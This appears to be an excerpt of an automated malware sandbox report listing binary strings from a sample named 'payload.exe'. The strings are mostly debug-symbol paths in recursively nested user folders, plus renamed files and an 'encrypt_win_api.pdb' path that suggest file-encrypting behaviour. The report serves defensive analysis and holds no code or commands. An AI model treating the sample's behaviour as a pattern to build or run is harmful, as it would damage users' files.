              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\4( source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303833195.0000000003D57000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299751780.0000000003D57000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284103523.00000000037C0000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290912491.00000000037CD000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241580855.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220343349.00000000037CD000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2194113704.00000000037CF000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2291587000.00000000037D0000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2194076770.00000000037C7000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261492169.00000000037C0000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193703978.00000000037BE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290747950.00000000037C8000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2313362539.00000000037CB000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2252360694.00000000037CF000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2254058984.00000000037D0000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2250768896.00000000037C0000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219190417.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2243373293.00000000037CF000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284743282.00000000037CD000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.23264611
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\20\\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290160289.0000000003C22000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errortorage\CacheStorage.edb.tgvve\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193490416.0000000003889000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.0000000003868000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299664958.0000000003C03000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285406721.0000000003BDB000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284252311.0000000003BC3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\#^m0 source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241580855.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2243108340.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219190417.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220175784.00000000037D5000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\p\D source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218928019.0000000003924000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241431328.000000000393D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220505539.000000000392F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218644067.00000000038EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218928019.0000000003924000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241431328.000000000393D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220505539.000000000392F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218644067.00000000038EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\c source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299293473.0000000003C9E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290618686.000000000339D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284691080.000000000338E000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285082947.0000000003395000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2283843769.0000000003366000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2291745039.00000000033A6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\*a\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284691080.000000000338E000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285082947.0000000003395000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2283843769.0000000003366000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2286049396.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2286088788.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\l source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303570677.000000000394C000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2306593926.000000000393F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2302847985.000000000394C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\\bi source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2250283430.000000000386A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2252822948.0000000003874000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2289759297.00000000037FF000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290952465.0000000003817000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\3 source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219190417.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219510848.00000000037F4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Ap source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242070892.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241962914.0000000003368000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\w source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2289759297.00000000037FF000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290952465.0000000003817000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\h source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303833195.0000000003CFF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.tgvva source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.0000000003868000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ewy\\n D source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2313169253.0000000003979000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2309346506.0000000003969000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\fnU source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241580855.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193886000.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193703978.00000000037BE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242013730.00000000037F4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219190417.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219510848.00000000037F4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242573181.00000000037F8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.tgvv source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242821627.0000000003B3B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ros source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193832137.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193661261.000000000338E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219190417.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219510848.00000000037F4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GPUCache\.pdb\a\Adobe source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2313304101.0000000003C23000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2309605483.0000000003C03000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\b source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261225726.0000000003986000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261008047.0000000003961000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2283443210.0000000003913000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2283524784.0000000003986000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb\TempState\h source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193490416.0000000003889000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.0000000003868000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290160289.0000000003C22000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285406721.0000000003C26000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\J source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299293473.0000000003C9E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\X source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299293473.0000000003C9E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\p\- source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2251080691.0000000003961000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241819824.000000000396A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241431328.0000000003961000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242783147.0000000003976000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2250283430.0000000003961000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2253471637.0000000003986000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284103523.00000000037C0000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2291587000.00000000037C8000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261492169.00000000037C0000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290747950.00000000037C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\* source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241819824.0000000003999000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242648733.0000000003999000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299664958.0000000003C03000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290353471.0000000003C82000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303180296.0000000003B63000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303090590.0000000003B33000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\a\* source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2251080691.0000000003961000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2250283430.0000000003961000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2251080691.0000000003961000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261008047.0000000003961000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261912171.0000000003961000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2250283430.0000000003961000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Cache\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2307032811.0000000003BF2000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2309605483.0000000003C03000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2253587616.0000000003B4B000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2264167577.000000000335B000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2262447295.000000000334D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2253827941.0000000003B5B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Users source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1960744215.0000000003391000.00000004.00000020.00020000.00000000.sdmp
